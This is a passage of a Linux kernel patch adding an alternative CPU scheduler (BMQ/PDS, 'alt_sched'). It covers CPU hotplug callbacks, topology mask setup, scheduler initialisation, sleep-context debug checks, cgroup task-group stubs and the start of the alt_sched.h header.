++ * Invoked from a CPUs hotplug control thread after the CPU has been marked
++ * inactive. All tasks which are not per CPU kernel threads are either
++ * pushed off this CPU now via balance_push() or placed on a different CPU
++ * during wakeup. Wait until the CPU is quiescent.
++ */
++static void balance_hotplug_wait(void)
++{
++	struct rq *rq = this_rq();
++
++	rcuwait_wait_event(&rq->hotplug_wait,
++			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
++			   TASK_UNINTERRUPTIBLE);
++}
++
++#else
++
++static void balance_push(struct rq *rq)
++{
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++}
++
++static inline void balance_hotplug_wait(void)
++{
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++static void set_rq_offline(struct rq *rq)
++{
++	if (rq->online)
++		rq->online = false;
++}
++
++static void set_rq_online(struct rq *rq)
++{
++	if (!rq->online)
++		rq->online = true;
++}
++
++/*
++ * used to mark begin/end of suspend/resume:
++ */
++static int num_cpus_frozen;
++
++/*
++ * Update cpusets according to cpu_active mask.  If cpusets are
++ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
++ * around partition_sched_domains().
++ *
++ * If we come here as part of a suspend/resume, don't touch cpusets because we
++ * want to restore it back to its original state upon resume anyway.
++ */
++static void cpuset_cpu_active(void)
++{
++	if (cpuhp_tasks_frozen) {
++		/*
++		 * num_cpus_frozen tracks how many CPUs are involved in suspend
++		 * resume sequence. As long as this is not the last online
++		 * operation in the resume sequence, just build a single sched
++		 * domain, ignoring cpusets.
++		 */
++		partition_sched_domains(1, NULL, NULL);
++		if (--num_cpus_frozen)
++			return;
++		/*
++		 * This is the last CPU online operation. So fall through and
++		 * restore the original sched domains by considering the
++		 * cpuset configurations.
++		 */
++		cpuset_force_rebuild();
++	}
++
++	cpuset_update_active_cpus();
++}
++
++static int cpuset_cpu_inactive(unsigned int cpu)
++{
++	if (!cpuhp_tasks_frozen) {
++		cpuset_update_active_cpus();
++	} else {
++		num_cpus_frozen++;
++		partition_sched_domains(1, NULL, NULL);
++	}
++	return 0;
++}
++
++int sched_cpu_activate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/*
++	 * Clear the balance_push callback and prepare to schedule
++	 * regular tasks.
++	 */
++	balance_push_set(cpu, false);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going up, increment the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_inc_cpuslocked(&sched_smt_present);
++#endif
++	set_cpu_active(cpu, true);
++
++	if (sched_smp_initialized)
++		cpuset_cpu_active();
++
++	/*
++	 * Put the rq online, if not already. This happens:
++	 *
++	 * 1) In the early boot process, because we build the real domains
++	 *    after all cpus have been brought up.
++	 *
++	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
++	 *    domains.
++	 */
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	set_rq_online(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	return 0;
++}
++
++int sched_cpu_deactivate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	int ret;
++
++	set_cpu_active(cpu, false);
++
++	/*
++	 * From this point forward, this CPU will refuse to run any task that
++	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
++	 * push those tasks away until this gets cleared, see
++	 * sched_cpu_dying().
++	 */
++	balance_push_set(cpu, true);
++
++	/*
++	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
++	 * users of this state to go away such that all new such users will
++	 * observe it.
++	 *
++	 * Specifically, we rely on ttwu to no longer target this CPU, see
++	 * ttwu_queue_cond() and is_cpu_allowed().
++	 *
++	 * Do sync before park smpboot threads to take care the rcu boost case.
++	 */
++	synchronize_rcu();
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	update_rq_clock(rq);
++	set_rq_offline(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going down, decrement the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
++		static_branch_dec_cpuslocked(&sched_smt_present);
++		if (!static_branch_likely(&sched_smt_present))
++			cpumask_clear(&sched_sg_idle_mask);
++	}
++#endif
++
++	if (!sched_smp_initialized)
++		return 0;
++
++	ret = cpuset_cpu_inactive(cpu);
++	if (ret) {
++		balance_push_set(cpu, false);
++		set_cpu_active(cpu, true);
++		return ret;
++	}
++
++	return 0;
++}
++
++static void sched_rq_cpu_starting(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	rq->calc_load_update = calc_load_update;
++}
++
++int sched_cpu_starting(unsigned int cpu)
++{
++	sched_rq_cpu_starting(cpu);
++	sched_tick_start(cpu);
++	return 0;
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++
++/*
++ * Invoked immediately before the stopper thread is invoked to bring the
++ * CPU down completely. At this point all per CPU kthreads except the
++ * hotplug thread (current) and the stopper thread (inactive) have been
++ * either parked or have been unbound from the outgoing CPU. Ensure that
++ * any of those which might be on the way out are gone.
++ *
++ * If after this point a bound task is being woken on this CPU then the
++ * responsible hotplug callback has failed to do it's job.
++ * sched_cpu_dying() will catch it with the appropriate fireworks.
++ */
++int sched_cpu_wait_empty(unsigned int cpu)
++{
++	balance_hotplug_wait();
++	return 0;
++}
++
++/*
++ * Since this CPU is going 'away' for a while, fold any nr_active delta we
++ * might have. Called from the CPU stopper task after ensuring that the
++ * stopper is the last running task on the CPU, so nr_active count is
++ * stable. We need to take the teardown thread which is calling this into
++ * account, so we hand in adjust = 1 to the load calculation.
++ *
++ * Also see the comment "Global load-average calculations".
++ */
++static void calc_load_migrate(struct rq *rq)
++{
++	long delta = calc_load_fold_active(rq, 1);
++
++	if (delta)
++		atomic_long_add(delta, &calc_load_tasks);
++}
++
++static void dump_rq_tasks(struct rq *rq, const char *loglvl)
++{
++	struct task_struct *g, *p;
++	int cpu = cpu_of(rq);
++
++	lockdep_assert_held(&rq->lock);
++
++	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
++	for_each_process_thread(g, p) {
++		if (task_cpu(p) != cpu)
++			continue;
++
++		if (!task_on_rq_queued(p))
++			continue;
++
++		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
++	}
++}
++
++int sched_cpu_dying(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/* Handle pending wakeups and then migrate everything off */
++	sched_tick_stop(cpu);
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
++		WARN(true, "Dying CPU not properly vacated!");
++		dump_rq_tasks(rq, KERN_WARNING);
++	}
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	calc_load_migrate(rq);
++	hrtick_clear(rq);
++	return 0;
++}
++#endif
++
++#ifdef CONFIG_SMP
++static void sched_init_topology_cpumask_early(void)
++{
++	int cpu;
++	cpumask_t *tmp;
++
++	for_each_possible_cpu(cpu) {
++		/* init topo masks */
++		tmp = per_cpu(sched_cpu_topo_masks, cpu);
++
++		cpumask_copy(tmp, cpumask_of(cpu));
++		tmp++;
++		cpumask_copy(tmp, cpu_possible_mask);
++		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
++		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
++		/*per_cpu(sd_llc_id, cpu) = cpu;*/
++	}
++}
++
++#define TOPOLOGY_CPUMASK(name, mask, last)\
++	if (cpumask_and(topo, topo, mask)) {					\
++		cpumask_copy(topo, mask);					\
++		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
++		       cpu, (topo++)->bits[0]);					\
++	}									\
++	if (!last)								\
++		cpumask_complement(topo, mask)
++
++static void sched_init_topology_cpumask(void)
++{
++	int cpu;
++	cpumask_t *topo;
++
++	for_each_online_cpu(cpu) {
++		/* take chance to reset time slice for idle tasks */
++		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
++
++		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++
++		cpumask_complement(topo, cpumask_of(cpu));
++#ifdef CONFIG_SCHED_SMT
++		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
++#endif
++		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
++		per_cpu(sched_cpu_llc_mask, cpu) = topo;
++		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
++
++		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
++
++		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
++
++		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
++		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
++		       cpu, per_cpu(sd_llc_id, cpu),
++		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
++			      per_cpu(sched_cpu_topo_masks, cpu)));
++	}
++}
++#endif
++
++void __init sched_init_smp(void)
++{
++	/* Move init over to a non-isolated CPU */
++	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
++		BUG();
++	current->flags &= ~PF_NO_SETAFFINITY;
++
++	sched_init_topology_cpumask();
++
++	sched_smp_initialized = true;
++}
++#else
++void __init sched_init_smp(void)
++{
++	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
++}
++#endif /* CONFIG_SMP */
++
++int in_sched_functions(unsigned long addr)
++{
++	return in_lock_functions(addr) ||
++		(addr >= (unsigned long)__sched_text_start
++		&& addr < (unsigned long)__sched_text_end);
++}
++
++#ifdef CONFIG_CGROUP_SCHED
++/* task group related information */
++struct task_group {
++	struct cgroup_subsys_state css;
++
++	struct rcu_head rcu;
++	struct list_head list;
++
++	struct task_group *parent;
++	struct list_head siblings;
++	struct list_head children;
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	unsigned long		shares;
++#endif
++};
++
++/*
++ * Default task group.
++ * Every task in system belongs to this group at bootup.
++ */
++struct task_group root_task_group;
++LIST_HEAD(task_groups);
++
++/* Cacheline aligned slab cache for task_group */
++static struct kmem_cache *task_group_cache __read_mostly;
++#endif /* CONFIG_CGROUP_SCHED */
++
++void __init sched_init(void)
++{
++	int i;
++	struct rq *rq;
++
++	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
++
++	wait_bit_init();
++
++#ifdef CONFIG_SMP
++	for (i = 0; i < SCHED_QUEUE_BITS; i++)
++		cpumask_copy(sched_rq_watermark + i, cpu_present_mask);
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++	task_group_cache = KMEM_CACHE(task_group, 0);
++
++	list_add(&root_task_group.list, &task_groups);
++	INIT_LIST_HEAD(&root_task_group.children);
++	INIT_LIST_HEAD(&root_task_group.siblings);
++#endif /* CONFIG_CGROUP_SCHED */
++	for_each_possible_cpu(i) {
++		rq = cpu_rq(i);
++
++		sched_queue_init(&rq->queue);
++		rq->watermark = IDLE_TASK_SCHED_PRIO;
++		rq->skip = NULL;
++
++		raw_spin_lock_init(&rq->lock);
++		rq->nr_running = rq->nr_uninterruptible = 0;
++		rq->calc_load_active = 0;
++		rq->calc_load_update = jiffies + LOAD_FREQ;
++#ifdef CONFIG_SMP
++		rq->online = false;
++		rq->cpu = i;
++
++#ifdef CONFIG_SCHED_SMT
++		rq->active_balance = 0;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
++#endif
++		rq->balance_callback = &balance_push_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++		rcuwait_init(&rq->hotplug_wait);
++#endif
++#endif /* CONFIG_SMP */
++		rq->nr_switches = 0;
++
++		hrtick_rq_init(rq);
++		atomic_set(&rq->nr_iowait, 0);
++	}
++#ifdef CONFIG_SMP
++	/* Set rq->online for cpu 0 */
++	cpu_rq(0)->online = true;
++#endif
++	/*
++	 * The boot idle thread does lazy MMU switching as well:
++	 */
++	mmgrab(&init_mm);
++	enter_lazy_tlb(&init_mm, current);
++
++	/*
++	 * The idle task doesn't need the kthread struct to function, but it
++	 * is dressed up as a per-CPU kthread and thus needs to play the part
++	 * if we want to avoid special-casing it in code that deals with per-CPU
++	 * kthreads.
++	 */
++	WARN_ON(!set_kthread_struct(current));
++
++	/*
++	 * Make us the idle thread. Technically, schedule() should not be
++	 * called from this thread, however somewhere below it might be,
++	 * but because we are the idle thread, we just pick up running again
++	 * when this runqueue becomes "idle".
++	 */
++	init_idle(current, smp_processor_id());
++
++	calc_load_update = jiffies + LOAD_FREQ;
++
++#ifdef CONFIG_SMP
++	idle_thread_set_boot_cpu();
++	balance_push_set(smp_processor_id(), false);
++
++	sched_init_topology_cpumask_early();
++#endif /* SMP */
++
++	psi_init();
++
++	preempt_dynamic_init();
++}
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++
++void __might_sleep(const char *file, int line)
++{
++	unsigned int state = get_current_state();
++	/*
++	 * Blocking primitives will set (and therefore destroy) current->state,
++	 * since we will exit with TASK_RUNNING make sure we enter with it,
++	 * otherwise we will destroy state.
++	 */
++	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
++			"do not call blocking ops when !TASK_RUNNING; "
++			"state=%x set at [<%p>] %pS\n", state,
++			(void *)current->task_state_change,
++			(void *)current->task_state_change);
++
++	__might_resched(file, line, 0);
++}
++EXPORT_SYMBOL(__might_sleep);
++
++static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
++{
++	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
++		return;
++
++	if (preempt_count() == preempt_offset)
++		return;
++
++	pr_err("Preemption disabled at:");
++	print_ip_sym(KERN_ERR, ip);
++}
++
++static inline bool resched_offsets_ok(unsigned int offsets)
++{
++	unsigned int nested = preempt_count();
++
++	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
++
++	return nested == offsets;
++}
++
++void __might_resched(const char *file, int line, unsigned int offsets)
++{
++	/* Ratelimiting timestamp: */
++	static unsigned long prev_jiffy;
++
++	unsigned long preempt_disable_ip;
++
++	/* WARN_ON_ONCE() by default, no rate limit required: */
++	rcu_sleep_check();
++
++	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
++	     !is_idle_task(current) && !current->non_block_count) ||
++	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
++	    oops_in_progress)
++		return;
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	/* Save this before calling printk(), since that will clobber it: */
++	preempt_disable_ip = get_preempt_disable_ip(current);
++
++	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
++	       file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), current->non_block_count,
++	       current->pid, current->comm);
++	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
++	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
++
++	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
++		pr_err("RCU nest depth: %d, expected: %u\n",
++		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
++	}
++
++	if (task_stack_end_corrupted(current))
++		pr_emerg("Thread overran stack, or stack corrupted\n");
++
++	debug_show_held_locks(current);
++	if (irqs_disabled())
++		print_irqtrace_events(current);
++
++	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
++				 preempt_disable_ip);
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL(__might_resched);
++
++void __cant_sleep(const char *file, int line, int preempt_offset)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > preempt_offset)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
++	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
++			in_atomic(), irqs_disabled(),
++			current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_sleep);
++
++#ifdef CONFIG_SMP
++void __cant_migrate(const char *file, int line)
++{
++	static unsigned long prev_jiffy;
++
++	if (irqs_disabled())
++		return;
++
++	if (is_migration_disabled(current))
++		return;
++
++	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
++		return;
++
++	if (preempt_count() > 0)
++		return;
++
++	if (current->migration_flags & MDF_FORCE_ENABLED)
++		return;
++
++	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
++		return;
++	prev_jiffy = jiffies;
++
++	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
++	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
++	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
++	       current->pid, current->comm);
++
++	debug_show_held_locks(current);
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++EXPORT_SYMBOL_GPL(__cant_migrate);
++#endif
++#endif
++
++#ifdef CONFIG_MAGIC_SYSRQ
++void normalize_rt_tasks(void)
++{
++	struct task_struct *g, *p;
++	struct sched_attr attr = {
++		.sched_policy = SCHED_NORMAL,
++	};
++
++	read_lock(&tasklist_lock);
++	for_each_process_thread(g, p) {
++		/*
++		 * Only normalize user tasks:
++		 */
++		if (p->flags & PF_KTHREAD)
++			continue;
++
++		schedstat_set(p->stats.wait_start,  0);
++		schedstat_set(p->stats.sleep_start, 0);
++		schedstat_set(p->stats.block_start, 0);
++
++		if (!rt_task(p)) {
++			/*
++			 * Renice negative nice level userspace
++			 * tasks back to 0:
++			 */
++			if (task_nice(p) < 0)
++				set_user_nice(p, 0);
++			continue;
++		}
++
++		__sched_setscheduler(p, &attr, false, false);
++	}
++	read_unlock(&tasklist_lock);
++}
++#endif /* CONFIG_MAGIC_SYSRQ */
++
++#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
++/*
++ * These functions are only useful for the IA64 MCA handling, or kdb.
++ *
++ * They can only be called when the whole system has been
++ * stopped - every CPU needs to be quiescent, and no scheduling
++ * activity can take place. Using them for anything else would
++ * be a serious bug, and as a result, they aren't even visible
++ * under any other configuration.
++ */
++
++/**
++ * curr_task - return the current task for a given CPU.
++ * @cpu: the processor in question.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ *
++ * Return: The current task for @cpu.
++ */
++struct task_struct *curr_task(int cpu)
++{
++	return cpu_curr(cpu);
++}
++
++#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
++
++#ifdef CONFIG_IA64
++/**
++ * ia64_set_curr_task - set the current task for a given CPU.
++ * @cpu: the processor in question.
++ * @p: the task pointer to set.
++ *
++ * Description: This function must only be used when non-maskable interrupts
++ * are serviced on a separate stack.  It allows the architecture to switch the
++ * notion of the current task on a CPU in a non-blocking manner.  This function
++ * must be called with all CPU's synchronised, and interrupts disabled, the
++ * and caller must save the original value of the current task (see
++ * curr_task() above) and restore that value before reenabling interrupts and
++ * re-starting the system.
++ *
++ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
++ */
++void ia64_set_curr_task(int cpu, struct task_struct *p)
++{
++	cpu_curr(cpu) = p;
++}
++
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++static void sched_free_group(struct task_group *tg)
++{
++	kmem_cache_free(task_group_cache, tg);
++}
++
++static void sched_free_group_rcu(struct rcu_head *rhp)
++{
++	sched_free_group(container_of(rhp, struct task_group, rcu));
++}
++
++static void sched_unregister_group(struct task_group *tg)
++{
++	/*
++	 * We have to wait for yet another RCU grace period to expire, as
++	 * print_cfs_stats() might run concurrently.
++	 */
++	call_rcu(&tg->rcu, sched_free_group_rcu);
++}
++
++/* allocate runqueue etc for a new task group */
++struct task_group *sched_create_group(struct task_group *parent)
++{
++	struct task_group *tg;
++
++	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
++	if (!tg)
++		return ERR_PTR(-ENOMEM);
++
++	return tg;
++}
++
++void sched_online_group(struct task_group *tg, struct task_group *parent)
++{
++}
++
++/* rcu callback to free various structures associated with a task group */
++static void sched_unregister_group_rcu(struct rcu_head *rhp)
++{
++	/* Now it should be safe to free those cfs_rqs: */
++	sched_unregister_group(container_of(rhp, struct task_group, rcu));
++}
++
++void sched_destroy_group(struct task_group *tg)
++{
++	/* Wait for possible concurrent references to cfs_rqs complete: */
++	call_rcu(&tg->rcu, sched_unregister_group_rcu);
++}
++
++void sched_release_group(struct task_group *tg)
++{
++}
++
++static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
++{
++	return css ? container_of(css, struct task_group, css) : NULL;
++}
++
++static struct cgroup_subsys_state *
++cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
++{
++	struct task_group *parent = css_tg(parent_css);
++	struct task_group *tg;
++
++	if (!parent) {
++		/* This is early initialization for the top cgroup */
++		return &root_task_group.css;
++	}
++
++	tg = sched_create_group(parent);
++	if (IS_ERR(tg))
++		return ERR_PTR(-ENOMEM);
++	return &tg->css;
++}
++
++/* Expose task group only after completing cgroup initialization */
++static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++	struct task_group *parent = css_tg(css->parent);
++
++	if (parent)
++		sched_online_group(tg, parent);
++	return 0;
++}
++
++static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	sched_release_group(tg);
++}
++
++static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
++{
++	struct task_group *tg = css_tg(css);
++
++	/*
++	 * Relies on the RCU grace period between css_released() and this.
++	 */
++	sched_unregister_group(tg);
++}
++
++#ifdef CONFIG_RT_GROUP_SCHED
++static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
++{
++	return 0;
++}
++#endif
++
++static void cpu_cgroup_attach(struct cgroup_taskset *tset)
++{
++}
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++static DEFINE_MUTEX(shares_mutex);
++
++int sched_group_set_shares(struct task_group *tg, unsigned long shares)
++{
++	/*
++	 * We can't change the weight of the root cgroup.
++	 */
++	if (&root_task_group == tg)
++		return -EINVAL;
++
++	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
++
++	mutex_lock(&shares_mutex);
++	if (tg->shares == shares)
++		goto done;
++
++	tg->shares = shares;
++done:
++	mutex_unlock(&shares_mutex);
++	return 0;
++}
++
++static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
++				struct cftype *cftype, u64 shareval)
++{
++	if (shareval > scale_load_down(ULONG_MAX))
++		shareval = MAX_SHARES;
++	return sched_group_set_shares(css_tg(css), scale_load(shareval));
++}
++
++static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
++			       struct cftype *cft)
++{
++	struct task_group *tg = css_tg(css);
++
++	return (u64) scale_load_down(tg->shares);
++}
++#endif
++
++static struct cftype cpu_legacy_files[] = {
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	{
++		.name = "shares",
++		.read_u64 = cpu_shares_read_u64,
++		.write_u64 = cpu_shares_write_u64,
++	},
++#endif
++	{ }	/* Terminate */
++};
++
++
++static struct cftype cpu_files[] = {
++	{ }	/* terminate */
++};
++
++static int cpu_extra_stat_show(struct seq_file *sf,
++			       struct cgroup_subsys_state *css)
++{
++	return 0;
++}
++
++struct cgroup_subsys cpu_cgrp_subsys = {
++	.css_alloc	= cpu_cgroup_css_alloc,
++	.css_online	= cpu_cgroup_css_online,
++	.css_released	= cpu_cgroup_css_released,
++	.css_free	= cpu_cgroup_css_free,
++	.css_extra_stat_show = cpu_extra_stat_show,
++#ifdef CONFIG_RT_GROUP_SCHED
++	.can_attach	= cpu_cgroup_can_attach,
++#endif
++	.attach		= cpu_cgroup_attach,
++	.legacy_cftypes	= cpu_files,
++	.legacy_cftypes	= cpu_legacy_files,
++	.dfl_cftypes	= cpu_files,
++	.early_init	= true,
++	.threaded	= true,
++};
++#endif	/* CONFIG_CGROUP_SCHED */
++
++#undef CREATE_TRACE_POINTS
+diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
+new file mode 100644
+index 000000000000..1212a031700e
+--- /dev/null
++++ b/kernel/sched/alt_debug.c
+@@ -0,0 +1,31 @@
++/*
++ * kernel/sched/alt_debug.c
++ *
++ * Print the alt scheduler debugging details
++ *
++ * Author: Alfred Chen
++ * Date  : 2020
++ */
++#include "sched.h"
++
++/*
++ * This allows printing both to /proc/sched_debug and
++ * to the console
++ */
++#define SEQ_printf(m, x...)			\
++ do {						\
++	if (m)					\
++		seq_printf(m, x);		\
++	else					\
++		pr_cont(x);			\
++ } while (0)
++
++void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
++			  struct seq_file *m)
++{
++	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
++						get_nr_threads(p));
++}
++
++void proc_sched_set_task(struct task_struct *p)
++{}
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+new file mode 100644
+index 000000000000..7c1cc0cbca0d
+--- /dev/null
++++ b/kernel/sched/alt_sched.h
+@@ -0,0 +1,660 @@
++#ifndef ALT_SCHED_H
++#define ALT_SCHED_H
++
++#include <linux/context_tracking.h>
++#include <linux/psi.h>
++#include <linux/stop_machine.h>
++#include <linux/syscalls.h>
++#include <linux/tick.h>
++
++#include <trace/events/power.h>
++#include <trace/events/sched.h>
++
++#include "../workqueue_internal.h"
++
++#include "cpupri.h"
++
++#ifdef CONFIG_SCHED_BMQ
++/* bits:
++ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
++#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
++#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
++#endif /* CONFIG_SCHED_PDS */
++
++#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
++
++#ifdef CONFIG_SCHED_DEBUG
++# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
++extern void resched_latency_warn(int cpu, u64 latency);
++#else
++# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
++static inline void resched_latency_warn(int cpu, u64 latency) {}
++#endif
++
++/*
++ * Increase resolution of nice-level calculations for 64-bit architectures.
++ * The extra resolution improves shares distribution and load balancing of
++ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
++ * hierarchies, especially on larger systems. This is not a user-visible change
++ * and does not change the user-interface for setting shares/weights.
++ *
++ * We increase resolution only if we have enough bits to allow this increased
++ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
++ * are pretty high and the returns do not justify the increased costs.
++ *
++ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
++ * increase coverage and consistency always enable it on 64-bit platforms.
++ */
++#ifdef CONFIG_64BIT
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
++# define scale_load_down(w) \
++({ \
++	unsigned long __w = (w); \
++	if (__w) \
++		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
++	__w; \
++})
++#else
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		(w)
++# define scale_load_down(w)	(w)
++#endif
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
++
++/*
++ * A weight of 0 or 1 can cause arithmetics problems.
++ * A weight of a cfs_rq is the sum of weights of which entities
++ * are queued on this cfs_rq, so a weight of a entity should not be
++ * too large, so as the shares value of a task group.
++ * (The default weight is 1024 - so there's no practical
++ *  limitation from this.)
++ */
++#define MIN_SHARES		(1UL <<  1)
++#define MAX_SHARES		(1UL << 18)
++#endif
++
++/*
++ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
++ */
++#ifdef CONFIG_SCHED_DEBUG
++# define const_debug __read_mostly
++#else
++# define const_debug const
++#endif
++
++/* task_struct::on_rq states: */
++#define TASK_ON_RQ_QUEUED	1
++#define TASK_ON_RQ_MIGRATING	2
++
++static inline int task_on_rq_queued(struct task_struct *p)
++{
++	return p->on_rq == TASK_ON_RQ_QUEUED;
++}
++
++static inline int task_on_rq_migrating(struct task_struct *p)
++{
++	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
++}
++
++/*
++ * wake flags
++ */
++#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
++#define WF_FORK		0x02		/* child wakeup after fork */
++#define WF_MIGRATED	0x04		/* internal use, task got migrated */
++
++#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
++
++struct sched_queue {
++	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
++	struct list_head heads[SCHED_BITS];
++};
++
